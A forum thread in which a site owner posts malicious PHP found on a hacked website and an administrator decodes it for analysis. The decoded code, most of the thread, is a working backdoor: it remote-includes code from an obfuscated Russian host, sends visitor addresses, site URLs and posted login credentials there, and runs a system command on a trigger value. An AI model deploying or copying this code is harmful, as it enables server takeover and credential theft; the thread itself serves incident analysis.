0YSwgJ0NvbnRlbnQtTGVuZ3RoOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ3NpemUnXSA9IHRyaW0oc3RyX2lyZXBsYWNlKCdDb250ZW50LUxlbmd0aDogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnRGF0ZTogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydhdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnRGF0ZTogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnTGFzdC1Nb2RpZmllZDogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydtdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnTGFzdC1Nb2RpZmllZDogJywgJycsICRkYXRhKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB9IGlmICgkaGVhZFsxXSA+PSA0MDApIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9XQVJOSU5HKTsgcmV0dXJuIGZhbHNlOyB9IGlmICgkaGVhZFsxXSA9PSAzMDQpIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9OT1RJQ0UpOyByZXR1cm4gZmFsc2U7IH0gcmV0dXJuIHRydWU7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCnB1YmxpYyBmdW5jdGlvbiBkaXJfb3BlbmRpcigkcGF0aCwgJG9wdGlvbnMpIHsgcmV0dXJuIGZhbHNlOyB9DQpwdWJsaWMgZnVuY3Rpb24gZGlyX3JlYWRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9jbG9zZWRpcigpIHsgcmV0dXJuOyB9DQpwdWJsaWMgZnVuY3Rpb24gdXJsX3N0YXQoJHBhdGgsICRmbGFncykgeyByZXR1cm4gYXJyYXkoKTsgfQ0KcHJvdGVjdGVkIGZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWyJsIl0pIGFuZCBpc3NldCgkX1BPU1RbInAiXSkpe2lmKGlzc2V0KCRfUE9TVFsiaW5wdXQiXSkpeyR1c2VyX2F1dGg9IiZsPSIuYmFzZTY0X2VuY29kZSgkX1BPU1RbImwiXSkuIiZwPSIuYmFzZTY0X2VuY29kZShtZDUoJF9QT1NUWyJwIl0pKTt9ZWxzZXskdXNlcl9hdXRoPSImbD0iLiRfUE9TVFsibCJdLiImcD0iLiRfUE9TVFsicCJdO319ZWxzZXskdXNlcl9hdXRoPSIiO31pZighaXNzZXQoJF9QT1NUWyJsb2dfZmxnIl0pKXskbG9nX2ZsZz0iJmxvZyI7fQ0KJHJraHQ9MTsNCmlmKHZlcnNpb25fY29tcGFyZShQSFBfVkVSU0lPTiwnNS4yJywnPj0nKSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2luY2x1ZGUnKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQppZigkcmtodD09MSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpeyRya2h0PTE7fWVsc2V7JHJraHQ9MDt9fQ0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiIkcCIuYmFzZTY0X2RlY29kZSgiTG5WelpYSnpMbUpwYzJobGJHd3VjblU9IikuIi8/cl9hZGRyPSIuc3ByaW50ZigiJXUiLCBpcDJsb25nKGdldGVudihSRU1PVEVfQUREUikpKS4iJnVybD0iLmJhc2U2NF9lbmNvZGUoJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0uJF9TRVJWRVJbUkVRVUVTVF9VUkldKS4kdXNlcl9hdXRoLiRsb2dfZmxnKSl7aWYoJF9QT1NUWyJsIl09PSJzcGVjaWFsIil7cHJpbnQgInN5c19hY3RpdmUiLmB1bmFtZSAtYWA7fX19DQplbHNle3N0cmVhbV93cmFwcGVyX3JlZ2lzdGVyKCdodHRwMicsJ25ld2h0dHAnKTtpZighQGluY2x1ZGVfb25jZShiYXNlNjRfZGVjb2RlKCJhSFIwY0RJNkx5OD0iKS4iJHAiLmJhc2U2NF9kZWNvZGUoIkxuVnpaWEp6TG1KcGMyaGxiR3d1Y25VPSIpLiIvP3JfYWRkcj0iLnNwcmludGYoIiV1IiwgaXAybG9uZyhnZXRlbnYoUkVNT1RFX0FERFIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSW1JFUVVFU1RfVVJJXSkuJHVzZXJfYXV0aC4kbG9nX2ZsZykpe2lmKCRfUE9TVFsibCJdPT0ic3BlY2lhbCIpe3ByaW50ICJzeXNfYWN0aXZlIi5gdW5hbWUgLWFgO319fQ0K")); ?>

Attached txt file as well.

[Admin]

CVM here is yours, i hope you can get to the bottom of the hack:

PHP Code:

<?PHP
error_reporting(0);$p="bagcfzzazbzbczfgizc";
class newhttp{
protected $fullurl; protected $p_url; protected $conn_id; protected $flushed; protected $mode = 4; protected $defmode; protected $redirects = 0; protected $binary; protected $options; protected $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
protected function error($msg='not connected') { if ($this->options & STREAM_REPORT_ERRORS) { trigger_error($msg, E_USER_WARNING); } return false; }
public function stream_open($path, $mode, $options, $opened_path) { $this->fullurl = $path; $this->options = $options; $this->defmode = $mode; $url = parse_url($path); if (empty($url['host'])) { return $this->error('missing host name'); } $this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2); if (!$this->conn_id) { return false; } if (empty($url['path'])) { $url['path'] = '/'; } $this->p_url = $url; $this->flushed = false; if ($mode[0] != 'r' || (strpos($mode, '+') !== false)) { $this->mode += 2; } $this->binary = (strpos($mode, 'b') !== false); $c = $this->context(); if (!isset($c['method'])) { stream_context_set_option($this->context, 'http', 'method', 'GET'); } if (!isset($c['header'])) { stream_context_set_option($this->context, 'http', 'header', ''); } if (!isset($c['user_agent'])) { stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent')); } if (!isset($c['content'])) { stream_context_set_option($this->context, 'http', 'content', ''); } if (!isset($c['max_redirects'])) { stream_context_set_option($this->context, 'http', 'max_redirects', 5); } return true; }
public function stream_close() { if ($this->conn_id) { fclose($this->conn_id); $this->conn_id = null; } }
public function stream_read($bytes) { if (!$this->conn_id) { return $this->error(); } if (!$this->flushed && !$this->stream_flush()) { return false; } if (feof($this->conn_id)) { return ''; } $bytes = max(1,$bytes); if ($this->binary) { return fread($this->conn_id, $bytes); } else { return fgets($this->conn_id, $bytes); } }
public function stream_write($data) { if (!$this->conn_id) { return $this->error(); } if (!$this->mode & 2) { return $this->error('Stream is in read-only mode'); } $c = $this->context(); stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST')); if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) { return strlen($data); } return 0; }
public function stream_eof() { if (!$this->conn_id) { return true; } if (!$this->flushed) { return false; } return feof($this->conn_id); }
public function stream_seek($offset, $whence) { return false; }
public function stream_tell() { return 0; }
public function stream_flush() { if ($this->flushed) { return false; } if (!$this->conn_id) { return $this->error(); } $c = $this->context(); $this->flushed = true; $RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' ); if (!empty($c['header'])) { $RequestHeaders[] = $c['header']; } if (!empty($c['content'])) { if ($c['method'] == 'PUT') { $RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain'); } else { $RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded'; } $RequestHeaders[] = 'Content-Length: '.strlen($c['content']); } $RequestHeaders[] = 'Connection: close'; if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) { return false; } if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) { return false; } global $http_response_header; $http_response_header = fgets($this->conn_id, 300); $data = rtrim($http_response_header); preg_match('#.* ([0-9]+) (.*)#i', $data, $head); if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) { $data = rtrim(fgets($this->conn_id, 300)); while (!empty($data)) { if (stripos($data, 'Location: ') !== false) { $new_location = trim(str_ireplace('Location: ', '', $data)); break; } $data = rtrim(fgets($this->conn_id, 300)); } trigger_error($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE); $this->stream_close(); return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush()); } $data = rtrim(fgets($this->conn_id, 1024)); while (!empty($data)) { $http_response_header .= $data."\r\n"; if (stripos($data, 'Content-Length: ') !== false) { $this->stat['size'] = trim(str_ireplace('Content-Length: ', '', $data)); } elseif (stripos($data, 'Date: ') !== false) { $this->stat['atime'] = strtotime(str_ireplace('Date: ', '', $data)); } elseif (stripos($data, 'Last-Modified: ') !== false) { $this->stat['mtime'] = strtotime(str_ireplace('Last-Modified: ', '', $data)); } $data = rtrim(fgets($this->conn_id, 1024)); } if ($head[1] >= 400) { trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING); return false; } if ($head[1] == 304) { trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE); return false; } return true; }
public function stream_stat() { $this->stream_flush(); return $this->stat; }
public function dir_opendir($path, $options) { return false; }
public function dir_readdir() { return ''; }
public function dir_rewinddir() { return ''; }
public function dir_closedir() { return; }
public function url_stat($path, $flags) { return array(); }
protected function context() { if (!$this->context) { $this->context = stream_context_create(); } $c = stream_context_get_options($this->context); return (isset($c['http']) ? $c['http'] : array()); }
}
if(isset($_POST["l"]) and isset($_POST["p"])){if(isset($_POST["input"])){$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));}else{$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];}}else{$user_auth="";}if(!isset($_POST["log_flg"])){$log_flg="&log";}
$rkht=1;
if(version_compare(PHP_VERSION,'5.2','>=')){if(ini_get('allow_url_include')){$rkht=1;}else{$rkht=0;}}
if($rkht==1){if(ini_get('allow_url_fopen')){$rkht=1;}else{$rkht=0;}}
if($rkht==1){if(!@include_once(base64_decode("aHR0cDovLw==")."$p".base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv(REMOTE_ADDR)))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER[REQUEST_URI]).$user_auth.$log_flg)){if($_POST["l"]=="special"){print "sys_active".`uname -a`;}}}
else{stream_wrapper_register('http2','newhttp');if(!@include_once(base64_decode("aHR0cDI6Ly8=")."$p".base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv(REMOTE_ADDR)))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER[REQUEST_URI]).$user_auth.$log_flg)){if($_POST["l"]=="special"){print "sys_active".`uname -a`;}}}
?>

lolaness, can you add your code either in php tags or attach the file as a .txt document. When you paste code directly on the board like that it adds breaks making it hard to piece back together to decode.

[lolaness]

Thank you for responding - and I'm sorry for the issue ... I simply didn't realize. I've attached the full code in the .txt here as well as a .zip of the actual .php.

Again, thank you! I really, really appreciate the help.

[Admin]

Quote:

Originally Posted by lolaness

Thank you for responding - and I'm sorry for the issue ... I simply didn't realize. I've attached the full code in the .txt here as well as a .zip of the actual .php.

Again, thank you! I really, really appreciate the help.

No problems, yeah it messes up the code and if there's just 1 character not right it won't decode.

Here you go:

[lolaness]

Quote:

Originally Posted by Admin

No problems, yeah it messes up the code and if there's just 1 character not right it won't decode.

Here you go:

total cliche but .... w00t!

Thank you so much - you've totally made my night